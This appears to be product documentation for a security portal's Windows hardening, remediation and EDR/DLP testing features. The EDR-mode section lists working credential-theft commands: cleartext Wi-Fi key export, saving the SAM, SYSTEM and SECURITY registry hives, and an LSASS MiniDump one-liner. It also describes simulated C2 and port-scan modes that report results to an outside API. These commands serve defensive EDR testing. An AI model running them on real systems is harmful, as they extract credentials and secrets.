Hardening & Configuration Management
Last updated
Last updated
Windows Hardening Results: This section displays the client machines and server hardening results. Benchmark controls are based on CIS and DOD, and these benchmarks are global standards. The Portal separates the results by risk scoring so that users can get more accurate results after analysis. Users can remediate results for a single machine, a group, or all devices on the portal. Also, users can trust the result by adding the rule to the classification rule. For multi-host hardening actions, it is recommended to use the Windows Hardening Results by Name section.
Right-click the "Remediation -> Remediate Security Control" option for remediation. After that, on the right side of the page, a small modal will appear, and users will define the settings for the job.
Please go to the "Security Assurance -> Remediation" page to see the remediation job. All the jobs are displayed on that page.
Windows Hardening Results by Name: This section displays benchmark controls aggregated by name. Also, the results are grouped by risk scores for better visibility. The same actions can be performed on the page.
Windows Security Controls Backup Values: This section allows users to roll back to old values before executing the remediation job. The Portal always backs up every value that has been remediated.
Security Control Results: This section displays security control results by benchmark standards. The users can analyze and remediate the failed results.
Windows EDR Analysis: This section displays EDR testing scenario results. The users can analyze and get feedback for EDR coverage of their system.
Windows DLP Analysis: This section displays DLP testing scenario results. The users can analyze and get feedback for DLP coverage of their system.
For EDR analysis we have 8 different modes that change the type of the action. We can change the EDR analysis mode with the EDR Policy. The mode type is below with a detailed explanation:
Basic: This mode runs defined basic commands. These commands are:
"powershell "Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending"",
"powershell "netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { _ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name=\"_" key=clear }"",
"powershell "Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate"",
"powershell "Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServes"",
"quser",
"net localgroup administrators",
"netsh firewall show all",
"net sessions",
"reg save hklm\sam ss.dat"
File Encryption: This mode encrypts created files on the host computer. These files are created from built-in files. The number of files are defined in EDR policy but the default value is 10.
LSASS Dump: This mode tries to create a dump file for LSASS by using the command below:
"powershell -Command "$lsass = Get-Process -Name lsass; $lsassId = $lsass.Id; $dumpPath = 'C:\temp\out.dmp'; $command = 'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ' + $lsassId + ' ' + $dumpPath + ' full'; Invoke-Expression $command""
Aggressive: This mode firts runs predefined commands and then applies selected action by user in the policy. Aggressive mode commands are:
"powershell "Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending"",
"powershell "netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { _ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name=\"_" key=clear }"",
"powershell "Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate"",
"powershell "Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServes"",
"quser",
"net localgroup administrators",
"netsh firewall show all",
"net sessions",
"reg save hklm\sam ss.dat",
"Reg.exe save HKLM\SYSTEM system.save",
"Reg.exe save HKLM\SECURITY security.save"
For the selected action, the first agent creates a file using built-in files and then based on the selection, encrypts or deletes that file.
C2: This mode first tries to get user directories and after that pings the local subnet for open ports. If any open ports are found, the agent tries to send those port info to a dummy API which is "https://clapi.cloudcyte.com/console/public/api/externaldatatest"
Portscan: This mode pings the local subnet for open ports. If any open ports are found, the agent tries to send those port info to a dummy API which is "https://clapi.cloudcyte.com/console/public/api/externaldatatest"
Custom: This mode runs a custom script defined by the user in the EDR policy.
Stealth: This mode applies selected actions by the user in the policy. For the selected action, the first agent creates a file using built-in files and then based on the selection, encrypts or deletes that file.
